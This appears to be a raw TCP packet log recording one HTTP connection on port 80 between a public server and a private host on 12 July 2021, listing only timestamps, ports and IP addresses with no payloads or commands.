Jul 12, 2021 10:28:46.276489019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.276540041 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.276567936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.276595116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.276616096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.276644945 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.277343035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.277384996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.277411938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.277436972 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.277472973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.277529955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.277643919 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.277673960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.277699947 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.277712107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.277765036 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.277795076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.277817965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.277842999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.277863979 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.278633118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.278669119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.278688908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.278722048 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.278740883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.278774977 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.278803110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.278829098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.278856993 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.278915882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.278971910 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.279403925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.279432058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.279453993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.279476881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.279499054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.279524088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.279532909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.279553890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.279586077 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.280311108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.280344963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.280380964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.280397892 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.280441999 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.280833960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.280865908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.280889034 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.280915976 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.280930042 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.280956030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.280968904 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.280994892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.281023026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.281044006 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.281673908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.281707048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.281757116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.281791925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.281814098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.281840086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.281852007 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.281877995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.281893015 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.281913996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.281965971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.282433033 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.282704115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.282727003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.282773018 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.282787085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.282812119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.282833099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.282841921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.282861948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.282891989 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.283397913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.283428907 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.283452988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.283483982 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.283518076 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.284073114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.284100056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.284121990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.284151077 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.284161091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.284185886 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.284212112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.284219980 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.284248114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.284265041 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.284720898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.284748077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.284770012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.284801006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.284809113 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.284835100 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.284847975 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.284902096 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.284929037 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.284950972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.285012960 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.285552025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.285578012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.285603046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.285629988 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.285640955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.285687923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.285701990 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.285832882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.285854101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.285877943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.285890102 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.285936117 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.286474943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.286547899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.286604881 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.286758900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.286797047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.286851883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.286935091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.286962032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.286986113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.287009001 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.287024021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.287054062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.287075043 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.287091970 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.287141085 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.287674904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.287884951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.287909985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.287955046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.287962914 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.287986040 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.288002968 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.288017988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.288041115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.288064957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.288083076 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.288129091 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.288636923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.288717985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.288739920 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.288760900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.288774967 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.288799047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.288829088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.288892984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.288916111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.288952112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.288969040 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.289019108 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.289617062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.289648056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.289670944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.289697886 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.289710999 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.289736032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.289762020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.289768934 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.289788008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.289813995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.289822102 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.289859056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.290560961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.290640116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.290663958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.290683985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.290699005 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.290719986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.290730000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.290750027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.290772915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.290795088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.290805101 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.290852070 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.291492939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.291521072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.291544914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.291568041 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.291589022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.291635990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.291661024 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.291686058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.291711092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.291743040 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.291872025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.291955948 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.292643070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.292670965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.292695045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.292721987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.292737007 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.292762995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.292774916 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.292800903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.292824030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.292848110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.292860031 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.292912006 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.293467999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.293495893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.293520927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.293545008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.293569088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.293581963 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.293597937 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.293613911 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.293636084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.293673992 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.293687105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.293736935 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.294346094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.294517994 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.294543982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.294580936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.294604063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.294632912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.294656038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.294670105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.294692039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.294713020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.294723988 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.294763088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.295337915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.295952082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.295974970 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.295994043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.296020985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.296041012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.296063900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.296075106 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.296098948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.296122074 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.296135902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.296191931 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.296601057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.296624899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.296644926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.296664953 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.296683073 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.296696901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.296721935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.296727896 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.296747923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.296772003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.296777964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.296834946 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.297373056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.297399044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.297420979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.297441959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.297470093 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.297482967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.297512054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.297518969 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.297544956 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.297560930 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.297583103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.297640085 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.298147917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.298202991 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.298238039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.298264980 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.298274040 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.298321962 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.298333883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.298356056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.298412085 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.298542023 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.298568964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.298629999 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.299124956 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.299159050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.299180984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.299201012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.299215078 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.299269915 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.299298048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.299319983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.299355984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.299372911 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.299388885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.299437046 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.300209045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.300232887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.300255060 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.300290108 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.300329924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.300380945 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.300405025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.300426960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.300447941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.300474882 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.300530910 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.300570965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.300626040 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.300966978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.301050901 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.301141024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.301162958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.301186085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.301198006 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.301230907 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.301321983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.301434994 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.301485062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.301497936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.301563025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.301611900 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.301925898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.301959991 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.302030087 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.302047968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.302073002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.302094936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.302122116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.302179098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.302205086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.302225113 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.302242994 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.302290916 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.302781105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.302813053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.302871943 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.302963018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.303031921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.303086042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.303092957 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.303133011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.303155899 CEST	80	49720	47.254.186.176	192.168.2.3
